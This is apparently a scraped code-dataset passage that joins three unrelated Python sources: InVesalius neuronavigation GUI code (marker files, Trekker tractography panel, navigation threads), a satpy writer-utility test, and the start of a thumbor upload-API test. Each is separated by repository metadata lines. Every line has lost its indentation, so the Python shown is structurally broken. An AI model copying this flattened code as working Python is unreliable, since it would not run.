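# more than 8 tab-separated fields per line: x, y, z, three angles, colour (r, g, b),
# size, marker_id and optionally a seed (x, y, z); older files only store
# x, y, z, colour (r, g, b), size and marker_id.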
if len(line) > 8:
coord = [float(s) for s in line[:6]]
colour = [float(s) for s in line[6:9]]
size = float(line[9])
# marker_id = line[10]
if len(line) > 11:
seed = [float(s) for s in line[11:14]]
else:
seed = 0., 0., 0.
# coord = float(line[0]), float(line[1]), float(line[2]), float(line[3]), float(line[4]), float(line[5])
# colour = float(line[6]), float(line[7]), float(line[8])
# size = float(line[9])
if len(line) >= 11:
for i in const.BTNS_IMG_MKS:
if line[10] in list(const.BTNS_IMG_MKS[i].values())[0]:
Publisher.sendMessage('Load image fiducials', marker_id=line[10], coord=coord)
elif line[10] == 'TARGET':
target = count_line
else:
line.append("")
self.CreateMarker(coord, colour, size, line[10], seed)
if target is not None:
self.OnMenuSetTarget(target)
else:
coord = float(line[0]), float(line[1]), float(line[2]), 0, 0, 0
colour = float(line[3]), float(line[4]), float(line[5])
size = float(line[6])
if len(line) == 8:
for i in const.BTNS_IMG_MKS:
if line[7] in list(const.BTNS_IMG_MKS[i].values())[0]:
Publisher.sendMessage('Load image fiducials', marker_id=line[7], coord=coord)
else:
line.append("")
self.CreateMarker(coord, colour, size, line[7])
count_line += 1
except:
wx.MessageBox(_("Invalid markers file."), _("InVesalius 3"))
def OnMarkersVisibility(self, evt, ctrl):
if ctrl.GetValue():
Publisher.sendMessage('Hide all markers', indexes=self.lc.GetItemCount())
ctrl.SetLabel('Show')
else:
Publisher.sendMessage('Show all markers', indexes=self.lc.GetItemCount())
ctrl.SetLabel('Hide')
def OnSaveMarkers(self, evt):
filename = dlg.ShowLoadSaveDialog(message=_(u"Save markers as..."),
wildcard=_("Marker files (*.mks)|*.mks"),
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT,
default_filename="markers.mks", save_ext="mks")
if filename:
if self.list_coord:
with open(filename, 'w', newline='') as file:
writer = csv.writer(file, delimiter='\t')
writer.writerows(self.list_coord)
# text_file = open(filename, "w")
# list_slice1 = self.list_coord[0]
# coord = str('%.3f' %self.list_coord[0][0]) + "\t" + str('%.3f' %self.list_coord[0][1]) + "\t" + str('%.3f' %self.list_coord[0][2])
# angles = str('%.3f' %self.list_coord[0][3]) + "\t" + str('%.3f' %self.list_coord[0][4]) + "\t" + str('%.3f' %self.list_coord[0][5])
# properties = str('%.3f' %list_slice1[6]) + "\t" + str('%.3f' %list_slice1[7]) + "\t" + str('%.3f' %list_slice1[8]) + "\t" + str('%.1f' %list_slice1[9]) + "\t" + list_slice1[10]
# line = coord + "\t" + angles + "\t" + properties + "\n"
# list_slice = self.list_coord[1:]
#
# for value in list_slice:
# coord = str('%.3f' %value[0]) + "\t" + str('%.3f' %value[1]) + "\t" + str('%.3f' %value[2])
# angles = str('%.3f' % value[3]) + "\t" + str('%.3f' % value[4]) + "\t" + str('%.3f' % value[5])
# properties = str('%.3f' %value[6]) + "\t" + str('%.3f' %value[7]) + "\t" + str('%.3f' %value[8]) + "\t" + str('%.1f' %value[9]) + "\t" + value[10]
# line = line + coord + "\t" + angles + "\t" +properties + "\n"
#
# text_file.writelines(line)
# text_file.close()
def OnSelectColour(self, evt, ctrl):
self.marker_colour = [colour/255.0 for colour in ctrl.GetValue()]
def OnSelectSize(self, evt, ctrl):
self.marker_size = ctrl.GetValue()
def CreateMarker(self, coord, colour, size, marker_id="x", seed=(0, 0, 0)):
# TODO: Use matrix coordinates and not world coordinates as the current method does.
# This would make inter-software comprehension easier.
Publisher.sendMessage('Add marker', ball_id=self.marker_ind, size=size, colour=colour, coord=coord[0:3])
self.marker_ind += 1
# List of lists with coordinates and properties of a marker
line = []
line.extend(coord)
line.extend(colour)
line.append(size)
line.append(marker_id)
line.extend(seed)
# line = [coord[0], coord[1], coord[2], coord[3], coord[4], coord[5], colour[0], colour[1], colour[2], size, marker_id]
# line = [coord[0], coord[1], coord[2], coord[3], coord[4], coord[5],
# colour[0], colour[1], colour[2], size, marker_id,
# seed[0], seed[1], seed[2]]
# Adding current line to a list of all markers already created
if not self.list_coord:
self.list_coord = [line]
else:
self.list_coord.append(line)
# Add item to list control in panel
num_items = self.lc.GetItemCount()
self.lc.InsertItem(num_items, str(num_items + 1))
self.lc.SetItem(num_items, 1, str(round(coord[0], 2)))
self.lc.SetItem(num_items, 2, str(round(coord[1], 2)))
self.lc.SetItem(num_items, 3, str(round(coord[2], 2)))
self.lc.SetItem(num_items, 4, str(marker_id))
self.lc.EnsureVisible(num_items)
def GetSelectedItems(self):
"""
Returns a list of the selected items in the list control.
"""
selection = []
index = self.lc.GetFirstSelected()
selection.append(index)
while len(selection) != self.lc.GetSelectedItemCount():
index = self.lc.GetNextSelected(index)
selection.append(index)
return selection
class DbsPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
class TractographyPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.affine = None
self.affine_vtk = None
self.trekker = None
self.n_tracts = const.N_TRACTS
self.peel_depth = const.PEEL_DEPTH
self.view_tracts = False
self.seed_offset = const.SEED_OFFSET
self.seed_radius = const.SEED_RADIUS
self.sleep_nav = const.SLEEP_NAVIGATION
self.brain_opacity = const.BRAIN_OPACITY
self.brain_peel = None
self.brain_actor = None
self.n_peels = const.MAX_PEEL_DEPTH
self.p_old = np.array([[0., 0., 0.]])
self.tracts_run = None
self.trekker_cfg = const.TREKKER_CONFIG
self.nav_status = False
self.SetAutoLayout(1)
self.__bind_events()
# Button for import config coil file
tooltip = wx.ToolTip(_("Load FOD"))
btn_load = wx.Button(self, -1, _("FOD"), size=wx.Size(50, 23))
btn_load.SetToolTip(tooltip)
btn_load.Enable(1)
btn_load.Bind(wx.EVT_BUTTON, self.OnLinkFOD)
# self.btn_load = btn_load
# Save button for object registration
tooltip = wx.ToolTip(_(u"Load Trekker configuration parameters"))
btn_load_cfg = wx.Button(self, -1, _(u"Configure"), size=wx.Size(65, 23))
btn_load_cfg.SetToolTip(tooltip)
btn_load_cfg.Enable(1)
btn_load_cfg.Bind(wx.EVT_BUTTON, self.OnLoadParameters)
# self.btn_load_cfg = btn_load_cfg
# Button for creating new coil
tooltip = wx.ToolTip(_("Load brain visualization"))
btn_mask = wx.Button(self, -1, _("Brain"), size=wx.Size(50, 23))
btn_mask.SetToolTip(tooltip)
btn_mask.Enable(1)
btn_mask.Bind(wx.EVT_BUTTON, self.OnLinkBrain)
# self.btn_new = btn_new
# Button for creating new coil
tooltip = wx.ToolTip(_("Load anatomical labels"))
btn_act = wx.Button(self, -1, _("ACT"), size=wx.Size(50, 23))
btn_act.SetToolTip(tooltip)
btn_act.Enable(1)
btn_act.Bind(wx.EVT_BUTTON, self.OnLoadACT)
# self.btn_new = btn_new
# Create a horizontal sizer to represent button save
line_btns = wx.BoxSizer(wx.HORIZONTAL)
line_btns.Add(btn_load, 1, wx.LEFT | wx.TOP | wx.RIGHT, 2)
line_btns.Add(btn_load_cfg, 1, wx.LEFT | wx.TOP | wx.RIGHT, 2)
line_btns.Add(btn_mask, 1, wx.LEFT | wx.TOP | wx.RIGHT, 2)
line_btns.Add(btn_act, 1, wx.LEFT | wx.TOP | wx.RIGHT, 2)
# Change peeling depth
text_peel_depth = wx.StaticText(self, -1, _("Peeling depth (mm):"))
spin_peel_depth = wx.SpinCtrl(self, -1, "", size=wx.Size(50, 23))
spin_peel_depth.Enable(1)
spin_peel_depth.SetRange(0, const.MAX_PEEL_DEPTH)
spin_peel_depth.SetValue(const.PEEL_DEPTH)
spin_peel_depth.Bind(wx.EVT_TEXT, partial(self.OnSelectPeelingDepth, ctrl=spin_peel_depth))
spin_peel_depth.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectPeelingDepth, ctrl=spin_peel_depth))
# Change number of tracts
text_ntracts = wx.StaticText(self, -1, _("Number tracts:"))
spin_ntracts = wx.SpinCtrl(self, -1, "", size=wx.Size(50, 23))
spin_ntracts.Enable(1)
spin_ntracts.SetRange(1, 2000)
spin_ntracts.SetValue(const.N_TRACTS)
spin_ntracts.Bind(wx.EVT_TEXT, partial(self.OnSelectNumTracts, ctrl=spin_ntracts))
spin_ntracts.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectNumTracts, ctrl=spin_ntracts))
# Change seed offset for computing tracts
text_offset = wx.StaticText(self, -1, _("Seed offset (mm):"))
spin_offset = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc=0.1)
spin_offset.Enable(1)
spin_offset.SetRange(0, 100.0)
spin_offset.SetValue(self.seed_offset)
spin_offset.Bind(wx.EVT_TEXT, partial(self.OnSelectOffset, ctrl=spin_offset))
spin_offset.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectOffset, ctrl=spin_offset))
# self.spin_offset = spin_offset
# Change seed radius for computing tracts
text_radius = wx.StaticText(self, -1, _("Seed radius (mm):"))
spin_radius = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc=0.1)
spin_radius.Enable(1)
spin_radius.SetRange(0, 100.0)
spin_radius.SetValue(self.seed_radius)
spin_radius.Bind(wx.EVT_TEXT, partial(self.OnSelectRadius, ctrl=spin_radius))
spin_radius.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectRadius, ctrl=spin_radius))
# self.spin_radius = spin_radius
# Change sleep pause between navigation loops
text_sleep = wx.StaticText(self, -1, _("Sleep (s):"))
spin_sleep = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc=0.01)
spin_sleep.Enable(1)
spin_sleep.SetRange(0.01, 10.0)
spin_sleep.SetValue(self.sleep_nav)
spin_sleep.Bind(wx.EVT_TEXT, partial(self.OnSelectSleep, ctrl=spin_sleep))
spin_sleep.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectSleep, ctrl=spin_sleep))
# Change opacity of brain mask visualization
text_opacity = wx.StaticText(self, -1, _("Brain opacity:"))
spin_opacity = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc=0.1)
spin_opacity.Enable(0)
spin_opacity.SetRange(0, 1.0)
spin_opacity.SetValue(self.brain_opacity)
spin_opacity.Bind(wx.EVT_TEXT, partial(self.OnSelectOpacity, ctrl=spin_opacity))
spin_opacity.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectOpacity, ctrl=spin_opacity))
self.spin_opacity = spin_opacity
# Create a horizontal sizer to threshold configs
border = 1
line_peel_depth = wx.BoxSizer(wx.HORIZONTAL)
line_peel_depth.AddMany([(text_peel_depth, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_peel_depth, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_ntracts = wx.BoxSizer(wx.HORIZONTAL)
line_ntracts.AddMany([(text_ntracts, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_ntracts, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_offset = wx.BoxSizer(wx.HORIZONTAL)
line_offset.AddMany([(text_offset, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_offset, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_radius = wx.BoxSizer(wx.HORIZONTAL)
line_radius.AddMany([(text_radius, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_radius, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_sleep = wx.BoxSizer(wx.HORIZONTAL)
line_sleep.AddMany([(text_sleep, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_sleep, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
line_opacity = wx.BoxSizer(wx.HORIZONTAL)
line_opacity.AddMany([(text_opacity, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
(spin_opacity, 0, wx.ALL | wx.EXPAND | wx.GROW, border)])
# Check box to enable tract visualization
checktracts = wx.CheckBox(self, -1, _('Enable tracts'))
checktracts.SetValue(False)
checktracts.Enable(0)
checktracts.Bind(wx.EVT_CHECKBOX, partial(self.OnEnableTracts, ctrl=checktracts))
self.checktracts = checktracts
# Check box to enable surface peeling
checkpeeling = wx.CheckBox(self, -1, _('Peel surface'))
checkpeeling.SetValue(False)
checkpeeling.Enable(0)
checkpeeling.Bind(wx.EVT_CHECKBOX, partial(self.OnShowPeeling, ctrl=checkpeeling))
self.checkpeeling = checkpeeling
# Check box to enable tract visualization
checkACT = wx.CheckBox(self, -1, _('ACT'))
checkACT.SetValue(False)
checkACT.Enable(0)
checkACT.Bind(wx.EVT_CHECKBOX, partial(self.OnEnableACT, ctrl=checkACT))
self.checkACT = checkACT
border_last = 1
line_checks = wx.BoxSizer(wx.HORIZONTAL)
line_checks.Add(checktracts, 0, wx.ALIGN_LEFT | wx.RIGHT | wx.LEFT, border_last)
line_checks.Add(checkpeeling, 0, wx.ALIGN_CENTER | wx.RIGHT | wx.LEFT, border_last)
line_checks.Add(checkACT, 0, wx.RIGHT | wx.LEFT, border_last)
# Add line sizers into main sizer
border = 1
border_last = 10
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(line_btns, 0, wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, border_last)
main_sizer.Add(line_peel_depth, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_ntracts, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_offset, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_radius, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_sleep, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_opacity, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, border)
main_sizer.Add(line_checks, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP | wx.BOTTOM, border_last)
main_sizer.Fit(self)
self.SetSizer(main_sizer)
self.Update()
def __bind_events(self):
Publisher.subscribe(self.OnCloseProject, 'Close project data')
Publisher.subscribe(self.OnUpdateTracts, 'Set cross focal point')
Publisher.subscribe(self.UpdateNavigationStatus, 'Navigation status')
def OnSelectPeelingDepth(self, evt, ctrl):
self.peel_depth = ctrl.GetValue()
if self.checkpeeling.GetValue():
actor = self.brain_peel.get_actor(self.peel_depth)
Publisher.sendMessage('Update peel', flag=True, actor=actor)
def OnSelectNumTracts(self, evt, ctrl):
self.n_tracts = ctrl.GetValue()
# self.tract.n_tracts = ctrl.GetValue()
Publisher.sendMessage('Update number of tracts', data=self.n_tracts)
def OnSelectOffset(self, evt, ctrl):
self.seed_offset = ctrl.GetValue()
# self.tract.seed_offset = ctrl.GetValue()
Publisher.sendMessage('Update seed offset', data=self.seed_offset)
def OnSelectRadius(self, evt, ctrl):
self.seed_radius = ctrl.GetValue()
# self.tract.seed_offset = ctrl.GetValue()
Publisher.sendMessage('Update seed radius', data=self.seed_radius)
def OnSelectSleep(self, evt, ctrl):
self.sleep_nav = ctrl.GetValue()
# self.tract.seed_offset = ctrl.GetValue()
Publisher.sendMessage('Update sleep', data=self.sleep_nav)
def OnSelectOpacity(self, evt, ctrl):
self.brain_actor.GetProperty().SetOpacity(ctrl.GetValue())
Publisher.sendMessage('Update peel', flag=True, actor=self.brain_actor)
def OnShowPeeling(self, evt, ctrl):
# self.view_peeling = ctrl.GetValue()
if ctrl.GetValue():
actor = self.brain_peel.get_actor(self.peel_depth)
else:
actor = None
Publisher.sendMessage('Update peel', flag=ctrl.GetValue(), actor=actor)
def OnEnableTracts(self, evt, ctrl):
self.view_tracts = ctrl.GetValue()
Publisher.sendMessage('Update tracts visualization', data=self.view_tracts)
if not self.view_tracts:
Publisher.sendMessage('Remove tracts')
Publisher.sendMessage("Update marker offset state", create=False)
def OnEnableACT(self, evt, ctrl):
# self.view_peeling = ctrl.GetValue()
# if ctrl.GetValue():
# act_data = self.brain_peel.get_actor(self.peel_depth)
# else:
# actor = None
Publisher.sendMessage('Enable ACT', data=ctrl.GetValue())
def UpdateNavigationStatus(self, nav_status, vis_status):
self.nav_status = nav_status
def OnLinkBrain(self, event=None):
Publisher.sendMessage('Update status text in GUI', label=_("Busy"))
Publisher.sendMessage('Begin busy cursor')
mask_path = dlg.ShowImportOtherFilesDialog(const.ID_NIFTI_IMPORT, _("Import brain mask"))
img_path = dlg.ShowImportOtherFilesDialog(const.ID_NIFTI_IMPORT, _("Import T1 anatomical image"))
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# mask_file = 'Baran_brain_mask.nii'
# mask_path = os.path.join(data_dir, mask_file)
# img_file = 'Baran_T1_inFODspace.nii'
# img_path = os.path.join(data_dir, img_file)
if not self.affine_vtk:
slic = sl.Slice()
prj_data = prj.Project()
matrix_shape = tuple(prj_data.matrix_shape)
self.affine = slic.affine.copy()
self.affine[1, -1] -= matrix_shape[1]
self.affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(self.affine)
try:
self.brain_peel = brain.Brain(img_path, mask_path, self.n_peels, self.affine_vtk)
self.brain_actor = self.brain_peel.get_actor(self.peel_depth)
self.brain_actor.GetProperty().SetOpacity(self.brain_opacity)
Publisher.sendMessage('Update peel', flag=True, actor=self.brain_actor)
self.checkpeeling.Enable(1)
self.checkpeeling.SetValue(True)
self.spin_opacity.Enable(1)
Publisher.sendMessage('Update status text in GUI', label=_("Brain model loaded"))
except:
wx.MessageBox(_("Unable to load brain mask."), _("InVesalius 3"))
Publisher.sendMessage('End busy cursor')
def OnLinkFOD(self, event=None):
Publisher.sendMessage('Update status text in GUI', label=_("Busy"))
Publisher.sendMessage('Begin busy cursor')
filename = dlg.ShowImportOtherFilesDialog(const.ID_NIFTI_IMPORT, msg=_("Import Trekker FOD"))
# Juuso
# data_dir = os.environ.get('OneDriveConsumer') + '\\data\\dti'
# FOD_path = 'sub-P0_dwi_FOD.nii'
# Baran
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# FOD_path = 'Baran_FOD.nii'
# filename = os.path.join(data_dir, FOD_path)
# if not self.affine_vtk:
# slic = sl.Slice()
# self.affine = slic.affine
# self.affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(self.affine)
if not self.affine_vtk:
slic = sl.Slice()
prj_data = prj.Project()
matrix_shape = tuple(prj_data.matrix_shape)
self.affine = slic.affine.copy()
self.affine[1, -1] -= matrix_shape[1]
self.affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(self.affine)
# try:
self.trekker = Trekker.initialize(filename.encode('utf-8'))
self.trekker, n_threads = dti.set_trekker_parameters(self.trekker, self.trekker_cfg)
self.checktracts.Enable(1)
self.checktracts.SetValue(True)
self.view_tracts = True
Publisher.sendMessage('Update Trekker object', data=self.trekker)
Publisher.sendMessage('Update number of threads', data=n_threads)
Publisher.sendMessage('Update tracts visualization', data=1)
Publisher.sendMessage('Update status text in GUI', label=_("Trekker initialized"))
# except:
# wx.MessageBox(_("Unable to initialize Trekker, check FOD and config files."), _("InVesalius 3"))
Publisher.sendMessage('End busy cursor')
def OnLoadACT(self, event=None):
Publisher.sendMessage('Update status text in GUI', label=_("Busy"))
Publisher.sendMessage('Begin busy cursor')
filename = dlg.ShowImportOtherFilesDialog(const.ID_NIFTI_IMPORT, msg=_("Import anatomical labels"))
# Baran
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# act_path = 'Baran_trekkerACTlabels_inFODspace.nii'
# filename = os.path.join(data_dir, act_path)
act_data = nb.squeeze_image(nb.load(filename))
act_data = nb.as_closest_canonical(act_data)
act_data.update_header()
act_data_arr = act_data.get_fdata()
if not self.affine_vtk:
slic = sl.Slice()
prj_data = prj.Project()
matrix_shape = tuple(prj_data.matrix_shape)
self.affine = slic.affine.copy()
self.affine[1, -1] -= matrix_shape[1]
self.affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(self.affine)
self.checkACT.Enable(1)
self.checkACT.SetValue(True)
Publisher.sendMessage('Update ACT data', data=act_data_arr)
Publisher.sendMessage('Enable ACT', data=True)
# Publisher.sendMessage('Create grid', data=act_data_arr, affine=self.affine)
# Publisher.sendMessage('Update number of threads', data=n_threads)
# Publisher.sendMessage('Update tracts visualization', data=1)
Publisher.sendMessage('Update status text in GUI', label=_("Trekker ACT loaded"))
Publisher.sendMessage('End busy cursor')
def OnLoadParameters(self, event=None):
import json
filename = dlg.ShowLoadSaveDialog(message=_(u"Load Trekker configuration"),
wildcard=_("JSON file (*.json)|*.json"))
try:
# Check if filename exists, read the JSON file and check if all parameters match
# with the required list defined in the constants module
# if a parameter is missing, raise an error
if filename:
with open(filename) as json_file:
self.trekker_cfg = json.load(json_file)
assert all(name in self.trekker_cfg for name in const.TREKKER_CONFIG)
if self.trekker:
self.trekker, n_threads = dti.set_trekker_parameters(self.trekker, self.trekker_cfg)
Publisher.sendMessage('Update Trekker object', data=self.trekker)
Publisher.sendMessage('Update number of threads', data=n_threads)
Publisher.sendMessage('Update status text in GUI', label=_("Trekker config loaded"))
except (AssertionError, json.decoder.JSONDecodeError):
# Inform user that file is not compatible
self.trekker_cfg = const.TREKKER_CONFIG
wx.MessageBox(_("File incompatible, using default configuration."), _("InVesalius 3"))
Publisher.sendMessage('Update status text in GUI', label="")
def OnUpdateTracts(self, position):
"""
Minimal working version of tract computation. Runs whenever the cross sends a Pubsub message to update.
Position refers to the coordinates in InVesalius 2D space. To represent the same coordinates in the 3D space,
flip the coordinates and multiply the z coordinate by -1. This is all done in the flip_x function.
:param position: list or array with the x, y, and z coordinates in InVesalius space
"""
# Minimal working version of tract computation
# It updates when cross updates
# pass
if self.view_tracts and not self.nav_status:
# print("Running during navigation")
coord_flip = list(position[:3])
coord_flip[1] = -coord_flip[1]
dti.compute_tracts(self.trekker, coord_flip, self.affine, self.affine_vtk,
self.n_tracts)
def OnCloseProject(self):
self.checktracts.SetValue(False)
self.checktracts.Enable(0)
self.checkpeeling.SetValue(False)
self.checkpeeling.Enable(0)
self.checkACT.SetValue(False)
self.checkACT.Enable(0)
self.spin_opacity.SetValue(const.BRAIN_OPACITY)
self.spin_opacity.Enable(0)
Publisher.sendMessage('Update peel', flag=False, actor=self.brain_actor)
self.peel_depth = const.PEEL_DEPTH
self.n_tracts = const.N_TRACTS
Publisher.sendMessage('Remove tracts')
class QueueCustom(queue.Queue):
"""
A custom queue subclass that provides a :meth:`clear` method.
https://stackoverflow.com/questions/6517953/clear-all-items-from-the-queue
Modified to a LIFO queue type (last in, first out), which makes sense for the navigation
threads, as the last added coordinate should be the first to be processed.
In initial short tests the coordinate queue grew considerably, so limiting
the queue size is probably a good idea.
"""
def clear(self):
"""
Clears all items from the queue.
"""
with self.mutex:
unfinished = self.unfinished_tasks - len(self.queue)
if unfinished <= 0:
if unfinished < 0:
raise ValueError('task_done() called too many times')
self.all_tasks_done.notify_all()
self.unfinished_tasks = unfinished
self.queue.clear()
self.not_full.notify_all()
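# Minimal usage sketch for QueueCustom (illustrative only; the queue name, maxsize
# and the tuple being queued are assumptions, not taken from the navigation code):
#   coord_queue = QueueCustom(maxsize=1)
#   coord_queue.put((coord, m_img, view_obj))
#   ...
#   coord_queue.clear()  # drop any stale coordinates between navigation runs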
class UpdateNavigationScene(threading.Thread):
def __init__(self, vis_queues, vis_components, event, sle):
"""Class (threading) to update the navigation scene with all graphical elements.
Sleep function in run method is used to avoid blocking GUI and more fluent, real-time navigation
:param affine_vtk: Affine matrix in vtkMatrix4x4 instance to update objects position in 3D scene
:type affine_vtk: vtkMatrix4x4
:param visualization_queue: Queue instance that manage coordinates to be visualized
:type visualization_queue: queue.Queue
:param event: Threading event to coordinate when tasks as done and allow UI release
:type event: threading.Event
:param sle: Sleep pause in seconds
:type sle: float
"""
threading.Thread.__init__(self, name='UpdateScene')
self.trigger_state, self.view_tracts = vis_components
self.coord_queue, self.trigger_queue, self.tracts_queue, self.icp_queue = vis_queues
self.sle = sle
self.event = event
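# Illustrative construction of this thread (the queue and flag names and the
# sleep value below are assumptions for the example, not values from this file):
#   vis_queues = (coord_queue, trigger_queue, tracts_queue, icp_queue)
#   vis_components = (trigger_state, view_tracts)
#   UpdateNavigationScene(vis_queues, vis_components, event, 0.175).start()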
def run(self):
# count = 0
while not self.event.is_set():
got_coords = False
try:
coord, m_img, view_obj = self.coord_queue.get_nowait()
got_coords = True
# print('UpdateScene: get {}'.format(count))
# use of CallAfter is mandatory otherwise crashes the wx interface
if self.view_tracts:
bundle, affine_vtk, coord_offset = self.tracts_queue.get_nowait()
#TODO: Check if possible to combine the Remove tracts with Update tracts in a single command
wx.CallAfter(Publisher.sendMessage, 'Remove tracts')
wx.CallAfter(Publisher.sendMessage, 'Update tracts', root=bundle,
affine_vtk=affine_vtk, coord_offset=coord_offset)
# wx.CallAfter(Publisher.sendMessage, 'Update marker offset', coord_offset=coord_offset)
self.tracts_queue.task_done()
if self.trigger_state:
trigger_on = self.trigger_queue.get_nowait()
if trigger_on:
wx.CallAfter(Publisher.sendMessage, 'Create marker')
self.trigger_queue.task_done()
#TODO: If view_tracts is enabled, substitute the raw coord with the offset coordinate, so the user
# sees the red cross in the position of the offset marker
wx.CallAfter(Publisher.sendMessage, 'Update slices position', position=coord[:3])
wx.CallAfter(Publisher.sendMessage, 'Set cross focal point', position=coord)
wx.CallAfter(Publisher.sendMessage, 'Update slice viewer')
if view_obj:
wx.CallAfter(Publisher.sendMessage, 'Update object matrix', m_img=m_img, coord=coord)
self.coord_queue.task_done()
# print('UpdateScene: done {}'.format(count))
# count += 1
sleep(self.sle)
except queue.Empty:
if got_coords:
self.coord_queue.task_done()
class InputAttributes(object):
# taken from https://stackoverflow.com/questions/2466191/set-attributes-from-dictionary-in-python
def __init__(self, *initial_data, **kwargs):
for dictionary in initial_data:
for key in dictionary:
setattr(self, key, dictionary[key])
for key in kwargs:
setattr(self, key, kwargs[key])
| gpl-2.0 | 275,369,215,335,656,960 | 44.27114 | 194 | 0.588407 | false |
pytroll/satpy | satpy/tests/writer_tests/test_utils.py | 1 | 1241 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2019 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Tests for writer utilities."""
import unittest
import satpy.writers.utils as wutils
class WriterUtilsTest(unittest.TestCase):
"""Test various writer utilities."""
def test_flatten_dict(self):
"""Test dictionary flattening."""
d = {'a': 1, 'b': {'c': 1, 'd': {'e': 1, 'f': {'g': [1, 2]}}}}
expected = {'a': 1,
'b_c': 1,
'b_d_e': 1,
'b_d_f_g': [1, 2]}
self.assertDictEqual(wutils.flatten_dict(d), expected)
| gpl-3.0 | 2,265,708,713,553,989,400 | 35.5 | 79 | 0.644641 | false |
okor/thumbor | tests/handlers/test_upload_api.py | 3 | 14343 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com [email protected]
from shutil import rmtree
import tempfile
import re
from preggy import expect
from thumbor.config import Config
from thumbor.importer import Importer
from thumbor.context import Context
from tests.base import TestCase
from tests.fixtures.images import (
valid_image, valid_image_path,
too_small_image, too_small_image_path,
too_heavy_image
)
class UploadTestCase(TestCase):
@classmethod
def setUpClass(cls, *args, **kw):
cls.root_path = tempfile.mkdtemp()
cls.base_uri = "/image"
@classmethod
def tearDownClass(cls, *args, **kw):
rmtree(cls.root_path)
@property
def upload_storage(self):
return self.context.modules.upload_photo_storage
def get_path_from_location(self, location):
return "/".join(
location.lstrip('/').rstrip('/').split('/')[1:-1]
)
def get_context(self):
self.default_filename = 'image'
cfg = Config()
cfg.UPLOAD_ENABLED = True
cfg.UPLOAD_PHOTO_STORAGE = 'thumbor.storages.file_storage'
cfg.FILE_STORAGE_ROOT_PATH = self.root_path
cfg.UPLOAD_DELETE_ALLOWED = False
cfg.UPLOAD_PUT_ALLOWED = False
cfg.UPLOAD_DEFAULT_FILENAME = self.default_filename
importer = Importer(cfg)
importer.import_modules()
return Context(None, cfg, importer)
class UploadAPINewFileTestCase(UploadTestCase):
def test_can_post_image_with_content_type(self):
filename = 'new_image_with_a_filename.jpg'
response = self.post(self.base_uri, {'Content-Type': 'image/jpeg', 'Slug': filename}, valid_image())
expect(response.code).to_equal(201)
expect(response.headers).to_include('Location')
expect(response.headers['Location']).to_match(self.base_uri + r'/[^\/]{32}/' + filename)
expected_path = self.get_path_from_location(response.headers['Location'])
